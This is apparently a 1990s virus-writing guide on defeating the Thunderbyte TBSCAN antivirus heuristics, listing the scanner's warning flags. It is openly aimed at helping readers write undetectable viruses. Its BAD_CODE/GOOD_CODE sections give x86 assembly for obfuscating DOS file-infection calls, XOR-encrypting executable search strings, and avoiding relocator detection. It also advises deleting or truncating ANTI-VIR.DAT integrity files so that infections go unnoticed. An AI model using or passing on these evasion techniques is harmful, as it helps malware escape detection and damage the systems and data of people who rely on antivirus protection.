Heuristics / Shmistics
by Köhntark
A guide to Anti-Heuristics / Shmistics Technology
INTRO Dear Reader: If you have been following the Virus / Anti-virus scene you might have stumbled upon the word "Heuristics." Heuristics is a term commonly used in artificial intelligence programs (Expert Systems etc.). So what does artificial intelligence have to do with software that is not even able to catch a Vienna.Grandma.Variant.#100 virus (CARO Name?) created by a 15 year old in his spare time? Well, it seems that the AV marketing strategists are running out of new technologies to sell to the ever hi-new-vapor-tech hungry public and have decided to add artificial intelligence to the latest Antiviral software bag of tricks. But how intelligent these "heuristics" programs really are? Is it just another vain marketing trick or is the sunrise of artificial intelligence upon us? Can we really have intelligent programs created by fools and demented megalomaniacs? I claim that heuristics AV programs are not intelligent at all and I will prove. First, please enter Thunderbyte Anti-Virus (TBAV), the dutch software shareware package that has become an underground favourite due to its liberal use of the word "heuristics" and to above average good quality. TBSCAN, TBAV's scanner is an incredibly fast program that usually identifies a high percentage of new and unknown viruses. TBSCAN is the most reliable scanner to discover the not-yet- named ditties created all around the world. Until Now. Enter Köhntark's "Heuristics / Shmistics guide." This informative program will show you how TBSCAN really works, how to ridicule this program, and to beat it flag by flag (you can think of flags as Heuristics warnings.) Now you can be the first one in your block to write anti- heuristics / Shmistics viruses! The process is incredibly simple: For each Flag or heuristic warning I have listed a BAD CODE (Example of evil, ugly code that causes heuristics flags to go off.) and GOOD CODE (Example of Good, Anti-Heuristics code.) All you have to do when you have a virus that raises specific flags in TBSCAN is: 1-Look up the specific Flag in the Heuristics / Shmistics guide 2-Look at the DON'T code (which corresponds more or less to your code) 3-Study the solution in the DO part. 4-Adapt the solution to your particular code. And voila!, viruses free of shmistics! With this program I have included 2 BIG examples: A GOOD example, the first virus this side of the galaxy not to raise ANY heuristics flags when scanned by TBSCAN. An EVIL example: a donothing file that, as you might have guessed does not do anything, and raises more heuristics flags than any virus known to mankind. I hope this information is enough to span the next generation of anti-heuristic / shmistic viruses, to inspire virus programmers worldwide to write and modify the trillions of viruses used as currency by some people, and to force the AV marketing strategists to come up with better ideas next time. (Shall I mention that Thunderbyte will have to rewrite its scanner?) enjoy! Köhntark
TBAV Terminology
1. Looking
2. Checking
3. Tracing
4. Scanning
5. Skipping
6. Go to TBAV Flags
"Looking" means that TbScan has successfully located the entry
point of the program in one step. The program code has been
identified so TbScan knows where to search without the need of
additional analysis.
Looking will be used on most files produced by known software.
"Checking" means that TbScan has successfully located the entry
point of the program, and is scanning a frame of about 4Kb
around the entry point. If the file is infected the signature
of the virus will be in this area. "Checking" is a very fast
and reliable scan algorithm.
Checking will be used on most files that are not produced by
known software.
"Tracing" means that TbScan has successfully traced a chain of
jumps or calls while locating the entry-point of the program,
and is scanning a frame of about 4Kb around this location. If
the file has been infected, the signature of the virus will be
in this area. "Tracing" is a fast and reliable scan algorithm.
Tracing will be primarily used for TSR-type COM files or Turbo
Pascal-compiled programs. Most viruses will force TbScan to use
"Tracing".
"Scanning" means that TbScan is scanning the entire file
(except for the exe-header which cannot contain any viral
code). This algorithm will be used if "Looking", "Checking" or
"Tracing" cannot be safely used. This is the case when the
entry-point of the program contains other jumps and calls to
code located outside the scanning frame, or when the heuristic
analyzer found something that should be investigated more
thoroughly. "Scanning" is a slow algorithm. Because it
processes almost the entire file, including data areas, false
alarms are more likely to occur.
The "Scanning" algorithm will be used while scanning
bootsectors, SYS and BIN files.
"Skipping" will occur with SYS and OVL files only. It simply
means that the file will not be scanned. As there are many SYS
files that contain no code at all (like CONFIG.SYS) it makes
absolutely no sense to scan these files for viruses.
The same applies to .OV? files. Many overlay files do not
deserve to be called as such as they lack an exe-header. Such
files cannot be invoked through DOS making them just as
invulnerable to direct virus attacks as .TXT files are. If a
virus is reported to have infected an .OV? file, it involved
one of the relatively few overlay files that does contain an
exe-header. The infection was then the result of the virus
monitoring the DOS exec-call (function 4Bh) and infecting any
program being invoked that way, including "real" overlay files.
TBAV Flags
# - Decryptor code found
! - Invalid program.
1 - 80186+ instructions.
@ - Strange instructions
? - Inconsistent header.
c - No integrity check
h - Hidden or System file.
i - Internal overlay.
p - Packed or compressed file.
w - Windows or OS/2 header.
A - Suspicious Memory Allocation
B - Back to entry.
C - File has been changed
D - Direct disk access
E - Flexible Entry-point
F - Suspicious file access
G - Garbage instructions.
J - Suspicious jump construct.
K - Unusual stack.
L - Program load trap
M - Memory resident code.
N - Wrong name extension.
O - code Overwrite.
R - Suspicious relocator
S - Search for executables
T - Invalid timestamp.
U - Undocumented system call.
V - Validated program
Y - Invalid boot sector.
Z - EXE/COM determinator.
# - Decryptor code found.
The file possibly contains a self-decryption routine. Some
copy-protected software is encrypted so this warning may appear for
some of your files. But if this warning appears in combination
with, for example, the "T" (invalid time stamp) warning, there could
be a virus involved and TbScan assumes the file is contaminated!
Many viruses encrypt themselves and cause this warning to be displayed.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
TBSCAN will trace right thru the most complicated encryption routines..
for polymorphic viruses this flag will be set most of the times..
including MTE and most TPE..
The more complex the routines are the more chances your virus has
of setting other flags such as the G (Garbage code) flag.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
The trick here is to use dumb encryption routines, the kind the
virus-guide writers hate.. why? because they are common in
commercial and shareware software programs and they are non-suspicious
looking. The main drawback with "Heuristics" Scanning is the possible
number of false positives, and using commonly used encryption routines
makes things worse.
This is why self appointed AV "researchers" had a hard time coming
up with reliable detection methods for Trident's Polymorphic Engine,
since it generates a lot of commonly found decryptors/encryptors.
Also I must note that there is a couple of extremely esoteric
encryption routines that will not be recognized by TBSCAN as
encryptions at all!
! - Invalid program.
Invalid opcode (non-8088 instructions) or out-of-range branch. The
program has either an entry point that located outside the body of the
file, or reveals a chain of jumps that can be traced to a location
outside the program file. Another possibility is that the program
contains invalid processor instructions. The program being checked is
probably damaged and cannot execute in most cases. At any rate, TbScan
avoids risk and uses the scan method to scan the file.
1 - 80186+ instructions.
The file contains instructions which cannot be executed by 8088
processors, and require an 80186 or better processor.
@ - Strange instructions
The file contains instructions which are not likely to be generated by an
assembler, but by some code generator like a polymorphic virus instead.
? - Inconsistent header.
The program being processed has an EXE-header that does not reflect the
actual program lay-out. Many viruses do not update the EXE-header of an
EXE file correctly after they infect the file, so if this warning pops up
frequently, it appears you have a problem.
h - Hidden or System file.
The file has the Hidden or the System file attribute set. This means
that the file is not visible in a DOS directory display but TbScan scans
it anyway. If you don t know the origin and/or purpose of this file, you
might be dealing with a Trojan Horse or a joke virus program. Copy
such a file onto a diskette, remove it from its program environment, and
then check if the program concerned is missing the file. If a program
does not miss it, you not only have freed some disk space, but you might
also have prevented a future disaster.
i - Internal overlay.
The program being processed has additional data or code behind the
load-module as specified in the EXE-header of the file. The program might
have internal overlay(s) or configuration or debug information appended
behind the load-module of the EXE file.
p - Packed or compressed file.
This means that the program is packed or compressed. There are some
utilities that can compress program files, such as EXEPACK and PKLITE.
If the file became infected after compression, TbScan is able to detect
the virus. However, if the file became infected before compression, the
virus was also compressed in the process, and a virus scanner might no
longer be able to recognize the virus. Fortunately, this does not happen
very often, but you should still beware! A new program might look clean,
but can turn out to be the carrier of a compressed virus. Other files in
your system will become infected too, and it is these infections that
will be clearly visible to virus scanners.
w - Windows or OS/2 header.
The program can be or is intended to run in a Windows (or OS/2)
environment. TbScan offers a specialized scanning method for these files.
C - File has been changed
This warning appears only if you use TbSetup to generate the ANTI-VIR.DAT
files and means the file has been changed. Upgrading the software would
trigger this message. Otherwise, it is very likely that a virus infected
the file!
NOTE:
TbScan does not display this warning if only some internal
configuration area of the file changes. This warning means that code
at the program entry point, the entry-point itself, and/or the file
size has been changed.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
The only way to avoid this is to delete or modify the Anti-Vir.Dat
file in each directory where you are infecting files to.
The easiest method is to delete the file, to overwrite or truncate
it, so it cannot be undeleted by a "smart" user.
For perfect "stealth" one could modify the contents of the file,
putting the right flag in the file-to-be-infected field describing
it as a "self-modifying" file. This is more involved and requires
unnecessary code, since the deleting of checksum files can be
implemented as a universal attack against several integrity checking
programs, not just TBSCAN.
c - No integrity check.
This warning indicates that no checksum/recovery information has
been found about the indicated file. It is highly recommended to
use TbSetup in this case to store information of the mentioned
file. This info can later be used for integrity checking and to
recover from virus infections.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
This is not really a flag... it won't raise any warnings by itself..
This only means that the file ANTI-VIR.DAT wasn't found in the current
directory you are scanning.. this is good news of course, as TBSCAN
cannot verify any checksum information for the files...
F - Suspicious file access.
TbScan has found instruction sequences common to infection schemes
used by viruses. This flag will appear with those programs that
are able to create or modify existing files.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
;Restore date and time of file to be infected
mov ax,5701h
mov dx,WORD PTR [si + OFFSET F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + OFFSET F_TIME - OFFSET VIRUS]
int 21h
;Restore file attributes
lea dx,[si + FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + ATTR - OFFSET VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
int 21h
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
;Restore date and time of file to be infected
mov ax,0A8FEh
mov dx,WORD PTR [si + F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + F_TIME - OFFSET VIRUS]
not ax ;A8FE becomes 5701
int 21h
;Restore file attributes
lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + OFFSET ATTR - OFFSET VIRUS] ;get old attributes
mov ax,0BCFEh
not ax ;BCFE becomes 4301h
int 21h
There is a million different ways of doing this, this is just an
example
R - Suspicious relocator.
Flag "R" refers to a suspicious relocator. A relocator is a
sequence of instructions that changes the proportion of CS:IP. It
is often used by viruses, especially COM type infectors. Tests on a
large collection of viruses show that TbScan issues this flag for
about 65% of all viruses. Those viruses have to relocate the CS:IP
proportion because they have been compiled for a specific location
in the executable file; a virus that infects another program can
hardly ever use its original location in the file as it is appended
to this file. Sound programs "know" their location in the
executable file, so they don't have to relocate themselves. On
systems that operate normally only a small percentage of the
programs should therefore cause this flag to be displayed.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
;*****************
; 1-OPEN FILE
;*****************
lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;open the file
mov ax,3D02h ;r/w access to it
int 21h
jc NO_GOOD ;error.. quit
xchg ax,bx ;bx = file handle
Where do you think the problem is?
Well, you might have read in clumsy virus writing guides of the joys
of using indexed instructions to access the virus' data locations in
memory to make your code fast and small. The "experts" use them even
in their soup and it makes their code tight.
Well, do you want tight code that can be recognized as a virus from
miles away or you want real, undetectable viruses?
If you chose the later do yourself a favour.. minimize the use of
indexes.
TBSCAN will set the R flag with just a few of them anywhere in your
code.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
mov bp,si ;flabby, fat code
add bp,OFFSET FNAME - OFFSET VIRUS ;but it unsuspicious!
mov dx,bp
mov ax,3D02h ;r/w access to it
int 21h
jc NO_GOOD ;error.. quit
xchg ax,bx ;bx = file handle
You can apply the same solution for any code that can be indexed:
mov WORD PTR [si + ATTR - VIRUS],cx ;save attributes
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for " "
add WORD PTR [si + LOC - VIRUS],cx
sub WORD PTR [si + LOC1 - VIRUS],dx
etc..
The strategy is the same.. it might add a lot of "fat" to your code,
but a fat virus is better than a dead one.
N - Wrong name extension.
Name conflict. The program carries the extension .EXE but appears
to be an ordinary .COM file, or it has the extension .COM but the
internal layout of an .EXE file. TbScan does not take any risk in
this situation, but scans the file for both EXE and COM type
signatures. A wrong name extension might in some cases indicate a
virus, but in most cases it doesn't.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
This will occur in extremely buggy viruses that cannot distinguish
EXE files from COMs or in stupid overwriting viruses.
There is also a couple of DOS 5.0 files, specifically DISK.COM that
have a EXE header, so special care must be taken in not raising extra
flags since any possible host may have heuristic flags of its own, so
any heuristic flags added by the virus will just make the file more
suspicious.
S - Search for executables.
The program searches for *.COM or *.EXE files. This by itself does
not indicate a virus, but it is an ingredient of most viruses
anyway (they have to search for suitable files to spread themselves).
If accompanied by other flags, TbScan will assume the file is infected
by a virus.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
The following code (even by itself!) is enough to set this flag:
db '*.COM'
db '*.EXE'
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
To get around this use what I call "point-encryption routine" to
make the strings into something not recognizable.. (Also, see the
Z flag)
mov bp,OFFSET COM_FILES ;decrypt *.COM string
call POINT_ENCRYPT
add bp,02
call POINT_ENCRYPT
lea dx,[si + OFFSET COM_FILES - OFFSET VIRUS ] ;dont use this..
;see R flag
mov ax,04E00h ;mov ah,4eh, => DOS search 1st file function
mov cx,3fh ;search for any file, with any attributes
int 21H
etc..
POINT_ENCRYPT:
push bp ;save bp to do dword encryptions
etc.
add bp,si
sub bp,OFFSET VIRUS ;the entry point of the virus is on si
xor WORD PTR [bp],ID2
pop bp ;restore bp
ret ;return to caller
COM_FILES
db 5Dh,59h,34h,38h,'M',0 ;encrypted *.COM,0
ID2 equ 7777h ;(used in POINT_ENCRYPT)
This is just one (and rather inefficient) way of doing this...
there are a million other ways... this is just to give you an idea.
For a more efficient way look in the example virus.
A - Suspicious Memory Allocation
The program uses a non-standard way to search for, and/or to allocate
memory. Many viruses try to hide themselves in memory, so they use a
non-standard way to allocate this memory. Some programs (such as
high-loaders or diagnostic software) also use non-standard ways to search
or allocate memory.
B - Back to entry.
The program seems to execute some code, and after that jumps back to the
entry-point of the program. Normally this results in an endless loop,
except when the program also modifies some of its instructions. This is
quite common behavior for computer viruses. In combination with any other
flag, TbScan reports a virus.
D - Direct disk access
This flag appears if the program being processed has instructions near
the entry-point to write to a disk directly. It is quite normal that some
disk related utilities trigger this flag. If several files that should
not be writing directly to the disk trigger this flag, your system might
be infected by an unknown virus.
NOTE:
A program that accesses the disk directly does not always have the
"D" flag. Only when the direct disk instructions are near the
program entry point does TbScan report it. If a virus is at fault,
the harmful instructions are always near the entry point, so it is
only there that TbScan looks for them.
E - Flexible Entry-point
This flag indicates that the program starts with a routine that
determines its location within the program file. This is rather
suspicious because sound programs have a fixed entry-point so they do not
have to determine this location. For viruses, however, this is quite
common. Approximately 50% of the known viruses trigger this flag.
G - Garbage instructions.
The program contains code that seems to have no purpose other than
encryption or avoiding recognition by virus scanners. In most cases there
won't be any other flag since the file is encrypted and the instructions
are hidden.
NOTE:
This flag appears occasionally on "normal" files. This simply
indicates, however, that these are poorly designed, not infected..
J - Suspicious jump construct.
The program did not start at the program entry point. The code has either
jumped at least twice before reaching the final startup code, or the
program jumped using an indirect operand. Sound programs should not
display this kind of strange behavior. If several files trigger this
flag, you should investigate your system thoroughly.
K - Unusual stack.
The EXE file being processed has an odd (instead of even) stack offset or
a suspicious stack segment. Many viruses are quite buggy by setting up
an illegal stack value.
L - Program load trap
The program might trap the execution of other software. If the file also
triggers the "M" flag (memory resident code), it is very likely that the
file is a resident program that determines when another program executes.
Many viruses trap the program load and use it to infect the program. Some
anti-virus utilities also trap the program load.
M - Memory resident code.
TbScan has found instruction sequences that could cause the program to
hook into important interrupts. Many TSR (Terminate and Stay Resident)
programs trigger this flag because hooking into interrupts is part of
their usual behavior. If several non-TSR programs trigger this warning
flag, however, you should be suspicious. It is likely that a virus that
remains resident in memory infected your files.
NOTE:
This warning does not appear with all true TSR programs, nor can you
always rely upon TSR detection in non-TSR programs.
O - code Overwrite.
This flag appears if TbScan detects that the program overwrites some of
its instructions. However, it does not seem to have a complete
(de)cryptor routine.
T - Invalid timestamp.
The timestamp of the program is invalid; that is, the number of seconds
in the time stamp is illegal, or the date is illegal or later than the
year 2000. This is suspicious because many viruses set the time stamp to
an illegal value (such as 62 seconds) to mark that they already infected
the file so they won't infect a file a second time. It is possible that
the program being checked is contaminated with a virus that is still
unknown, especially if several files on your system have an invalid time
stamp. If only very few programs have an invalid time stamp, you d better
correct it and scan frequently to check that the time stamp of the files
remains valid.
U - Undocumented system call.
The program uses unknown DOS calls or interrupts. These unknown calls can
be issued to invoke undocumented DOS features, or to communicate with an
unknown driver in memory. Since many viruses use undocumented DOS
features, or communicate with memory resident parts of a previously
loaded instance of the virus, a program is suspicious if it performs
unknown or undocumented communications. This does not necessarily
indicate a virus, however, since some tricky programs also use
undocumented features.
V - Validated program
The program has been validated to avoid false alarms. The design of this
program would normally cause a false alarm by the heuristic scan mode of
TbScan, or this program might change frequently, and TbScan excludes the
file from integrity checking. Either TbSetup (automatically) or by TbScan
(manually) stores these exclusions in the ANTI-VIR.DAT.
Y - Invalid boot sector.
The boot sector is not completely according to the IBM defined boot
sector format. It is possible that the boot sector contains a virus or
has been corrupted.
Z - EXE/COM determinator.
The program seems to check whether a file is a COM or EXE type program.
Infecting a COM file is a process that is not similar to infecting an EXE
file, which implies that viruses able to infect both program types should
also be able to distinguish between them. There are, of course, innocent
programs that need to find out whether a file is a COM or EXE file.
Executable file compressors, EXE2COM, converters, debuggers, and
high-loaders are examples of programs that might contain a routine to
distinguish between EXE and COM files.